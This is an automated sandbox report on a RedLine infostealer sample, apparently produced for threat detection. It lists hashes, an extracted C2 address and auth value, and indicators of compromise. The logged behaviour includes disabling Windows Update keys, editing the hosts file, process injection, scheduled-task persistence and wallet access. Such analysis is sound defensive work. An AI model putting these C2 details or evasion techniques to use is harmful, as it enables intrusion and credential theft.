redline | 421fb3c3e9b2d45d1a831d5a3cf1e7a6574dae2cfc110c75a8688b023ad723d6

Analysis

max time kernel
151s
max time network
129s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
02/01/2023, 12:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9b1a7106c9059379d3e50abf93d63bc156b81cc1.exe
Size

119KB
MD5

8768624262961d13c13c3d59a7483dd4
SHA1

9b1a7106c9059379d3e50abf93d63bc156b81cc1
SHA256

421fb3c3e9b2d45d1a831d5a3cf1e7a6574dae2cfc110c75a8688b023ad723d6
SHA512

44ab5a6b5e42ff38eee5ea516f36c4962634412335f3a78132d129972fc9038d9b9d4d594b7dfff19fc66d050012cbbbf9e316521ce45159a9caa2eb3f40201d
SSDEEP

3072:iISDRIJX/nbVdzrz5XhBWJekHzTUuAngc1I5yHWXKc:o14/nzVhBYHMNHWXKc

Score

10^/10

redline 1 evasion infostealer spyware

Malware Config

Extracted

Family

redline

Botnet

107.182.129.73:21733

Attributes

auth_value
3a5bb0917495b4312d052a0b8977d2bb

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/2276-186-0x00000000001E0000-0x0000000000200000-memory.dmp	family_redline

Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 4348 created 4248	4348	WerFault.exe	44
PID 4208 created 3232	4208	WerFault.exe	61
PID 5100 created 912	5100	WerFault.exe	131
PID 4408 created 4100	4408	WerFault.exe	134

Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs

description	pid	Process	procid_target
PID 4268 created 3044	4268	SmartDefRun.exe	63
PID 4268 created 3044	4268	SmartDefRun.exe	63
PID 4268 created 3044	4268	SmartDefRun.exe	63
PID 4268 created 3044	4268	SmartDefRun.exe	63
PID 5000 created 596	5000	powershell.EXE	3
PID 5076 created 3232	5076	svchost.exe	61
PID 5076 created 4248	5076	svchost.exe	44
PID 5076 created 912	5076	svchost.exe	131
PID 5076 created 4100	5076	svchost.exe	134

Blocklisted process makes network request 1 IoCs

flow	pid	Process
18	3980	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe

Executes dropped EXE 5 IoCs

pid	Process
816	C4Loader.exe
4476	new2.exe
4824	SysApp.exe
4268	SmartDefRun.exe
4964	fodhelper.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Drops file in System32 directory 16 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Telemetry Logging	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4024 set thread context of 4452	4024	9b1a7106c9059379d3e50abf93d63bc156b81cc1.exe	79
PID 4476 set thread context of 2276	4476	new2.exe	108
PID 4268 set thread context of 2140	4268	SmartDefRun.exe	118
PID 5000 set thread context of 1160	5000	powershell.EXE	123

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe	SmartDefRun.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3092	sc.exe
4040	sc.exe
1288	sc.exe
3040	sc.exe
2508	sc.exe

Program crash 6 IoCs

pid	pid_target	Process	procid_target
4568	4024	WerFault.exe	77
3060	4476	WerFault.exe	91
1064	3232	WerFault.exe	61
2216	4248	WerFault.exe	44
2164	912	WerFault.exe	131
1728	4100	WerFault.exe	134

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
5048	schtasks.exe
4500	schtasks.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1672666934"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={CBAD3673-59B1-4CAE-9103-3B3D1CDA7408}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 02 Jan 2023 12:42:15 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3980	powershell.exe
3980	powershell.exe
4824	SysApp.exe
4824	SysApp.exe
4824	SysApp.exe
4824	SysApp.exe
4824	SysApp.exe
4824	SysApp.exe
4824	SysApp.exe
4824	SysApp.exe
4824	SysApp.exe
4824	SysApp.exe
4268	SmartDefRun.exe
4268	SmartDefRun.exe
1624	powershell.exe
1624	powershell.exe
4268	SmartDefRun.exe
4268	SmartDefRun.exe
4268	SmartDefRun.exe
4268	SmartDefRun.exe
5044	powershell.exe
5044	powershell.exe
4268	SmartDefRun.exe
4268	SmartDefRun.exe
1812	powershell.EXE
5000	powershell.EXE
5000	powershell.EXE
1812	powershell.EXE
5000	powershell.EXE
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1064	WerFault.exe
1064	WerFault.exe
1160	dllhost.exe
1160	dllhost.exe
2216	WerFault.exe
2216	WerFault.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe
1160	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3044	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeIncreaseQuotaPrivilege	5044	powershell.exe
Token: SeSecurityPrivilege	5044	powershell.exe
Token: SeTakeOwnershipPrivilege	5044	powershell.exe
Token: SeLoadDriverPrivilege	5044	powershell.exe
Token: SeSystemProfilePrivilege	5044	powershell.exe
Token: SeSystemtimePrivilege	5044	powershell.exe
Token: SeProfSingleProcessPrivilege	5044	powershell.exe
Token: SeIncBasePriorityPrivilege	5044	powershell.exe
Token: SeCreatePagefilePrivilege	5044	powershell.exe
Token: SeBackupPrivilege	5044	powershell.exe
Token: SeRestorePrivilege	5044	powershell.exe
Token: SeShutdownPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeSystemEnvironmentPrivilege	5044	powershell.exe
Token: SeRemoteShutdownPrivilege	5044	powershell.exe
Token: SeUndockPrivilege	5044	powershell.exe
Token: SeManageVolumePrivilege	5044	powershell.exe
Token: 33	5044	powershell.exe
Token: 34	5044	powershell.exe
Token: 35	5044	powershell.exe
Token: 36	5044	powershell.exe
Token: SeIncreaseQuotaPrivilege	5044	powershell.exe
Token: SeSecurityPrivilege	5044	powershell.exe
Token: SeTakeOwnershipPrivilege	5044	powershell.exe
Token: SeLoadDriverPrivilege	5044	powershell.exe
Token: SeSystemProfilePrivilege	5044	powershell.exe
Token: SeSystemtimePrivilege	5044	powershell.exe
Token: SeProfSingleProcessPrivilege	5044	powershell.exe
Token: SeIncBasePriorityPrivilege	5044	powershell.exe
Token: SeCreatePagefilePrivilege	5044	powershell.exe
Token: SeBackupPrivilege	5044	powershell.exe
Token: SeRestorePrivilege	5044	powershell.exe
Token: SeShutdownPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeSystemEnvironmentPrivilege	5044	powershell.exe
Token: SeRemoteShutdownPrivilege	5044	powershell.exe
Token: SeUndockPrivilege	5044	powershell.exe
Token: SeManageVolumePrivilege	5044	powershell.exe
Token: 33	5044	powershell.exe
Token: 34	5044	powershell.exe
Token: 35	5044	powershell.exe
Token: 36	5044	powershell.exe
Token: SeIncreaseQuotaPrivilege	5044	powershell.exe
Token: SeSecurityPrivilege	5044	powershell.exe
Token: SeTakeOwnershipPrivilege	5044	powershell.exe
Token: SeLoadDriverPrivilege	5044	powershell.exe
Token: SeSystemProfilePrivilege	5044	powershell.exe
Token: SeSystemtimePrivilege	5044	powershell.exe
Token: SeProfSingleProcessPrivilege	5044	powershell.exe
Token: SeIncBasePriorityPrivilege	5044	powershell.exe
Token: SeCreatePagefilePrivilege	5044	powershell.exe
Token: SeBackupPrivilege	5044	powershell.exe
Token: SeRestorePrivilege	5044	powershell.exe
Token: SeShutdownPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeSystemEnvironmentPrivilege	5044	powershell.exe
Token: SeRemoteShutdownPrivilege	5044	powershell.exe
Token: SeUndockPrivilege	5044	powershell.exe
Token: SeManageVolumePrivilege	5044	powershell.exe
Token: 33	5044	powershell.exe
Token: 34	5044	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4024 wrote to memory of 4452	4024	9b1a7106c9059379d3e50abf93d63bc156b81cc1.exe	79
PID 4024 wrote to memory of 4452	4024	9b1a7106c9059379d3e50abf93d63bc156b81cc1.exe	79
PID 4024 wrote to memory of 4452	4024	9b1a7106c9059379d3e50abf93d63bc156b81cc1.exe	79
PID 4024 wrote to memory of 4452	4024	9b1a7106c9059379d3e50abf93d63bc156b81cc1.exe	79
PID 4024 wrote to memory of 4452	4024	9b1a7106c9059379d3e50abf93d63bc156b81cc1.exe	79
PID 4452 wrote to memory of 3980	4452	vbc.exe	83
PID 4452 wrote to memory of 3980	4452	vbc.exe	83
PID 4452 wrote to memory of 3980	4452	vbc.exe	83
PID 3980 wrote to memory of 816	3980	powershell.exe	90
PID 3980 wrote to memory of 816	3980	powershell.exe	90
PID 3980 wrote to memory of 816	3980	powershell.exe	90
PID 3980 wrote to memory of 4476	3980	powershell.exe	91
PID 3980 wrote to memory of 4476	3980	powershell.exe	91
PID 3980 wrote to memory of 4476	3980	powershell.exe	91
PID 3980 wrote to memory of 4824	3980	powershell.exe	92
PID 3980 wrote to memory of 4824	3980	powershell.exe	92
PID 3980 wrote to memory of 4824	3980	powershell.exe	92
PID 3980 wrote to memory of 4268	3980	powershell.exe	93
PID 3980 wrote to memory of 4268	3980	powershell.exe	93
PID 3644 wrote to memory of 1288	3644	cmd.exe	105
PID 3644 wrote to memory of 1288	3644	cmd.exe	105
PID 3644 wrote to memory of 3040	3644	cmd.exe	106
PID 3644 wrote to memory of 3040	3644	cmd.exe	106
PID 4476 wrote to memory of 2276	4476	new2.exe	108
PID 4476 wrote to memory of 2276	4476	new2.exe	108
PID 4476 wrote to memory of 2276	4476	new2.exe	108
PID 4476 wrote to memory of 2276	4476	new2.exe	108
PID 3644 wrote to memory of 2508	3644	cmd.exe	107
PID 3644 wrote to memory of 2508	3644	cmd.exe	107
PID 4476 wrote to memory of 2276	4476	new2.exe	108
PID 3644 wrote to memory of 3092	3644	cmd.exe	111
PID 3644 wrote to memory of 3092	3644	cmd.exe	111
PID 3644 wrote to memory of 4040	3644	cmd.exe	112
PID 3644 wrote to memory of 4040	3644	cmd.exe	112
PID 3644 wrote to memory of 400	3644	cmd.exe	113
PID 3644 wrote to memory of 400	3644	cmd.exe	113
PID 3644 wrote to memory of 4100	3644	cmd.exe	114
PID 3644 wrote to memory of 4100	3644	cmd.exe	114
PID 3644 wrote to memory of 4900	3644	cmd.exe	115
PID 3644 wrote to memory of 4900	3644	cmd.exe	115
PID 3644 wrote to memory of 4864	3644	cmd.exe	116
PID 3644 wrote to memory of 4864	3644	cmd.exe	116
PID 3644 wrote to memory of 1012	3644	cmd.exe	117
PID 3644 wrote to memory of 1012	3644	cmd.exe	117
PID 4268 wrote to memory of 2140	4268	SmartDefRun.exe	118
PID 5000 wrote to memory of 1160	5000	powershell.EXE	123
PID 5000 wrote to memory of 1160	5000	powershell.EXE	123
PID 5000 wrote to memory of 1160	5000	powershell.EXE	123
PID 5000 wrote to memory of 1160	5000	powershell.EXE	123
PID 5000 wrote to memory of 1160	5000	powershell.EXE	123
PID 5000 wrote to memory of 1160	5000	powershell.EXE	123
PID 5000 wrote to memory of 1160	5000	powershell.EXE	123
PID 5000 wrote to memory of 1160	5000	powershell.EXE	123
PID 5000 wrote to memory of 1160	5000	powershell.EXE	123
PID 1160 wrote to memory of 596	1160	dllhost.exe	3
PID 1160 wrote to memory of 680	1160	dllhost.exe	1
PID 1160 wrote to memory of 952	1160	dllhost.exe	9
PID 1160 wrote to memory of 60	1160	dllhost.exe	10
PID 1160 wrote to memory of 440	1160	dllhost.exe	11
PID 1160 wrote to memory of 700	1160	dllhost.exe	15
PID 1160 wrote to memory of 1036	1160	dllhost.exe	17
PID 1160 wrote to memory of 1056	1160	dllhost.exe	18
PID 1160 wrote to memory of 1124	1160	dllhost.exe	19
PID 1160 wrote to memory of 1200	1160	dllhost.exe	20

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:680

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:596
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:60
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0410c011-363a-44d4-b60d-706c6fe17275}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1124
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2472
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
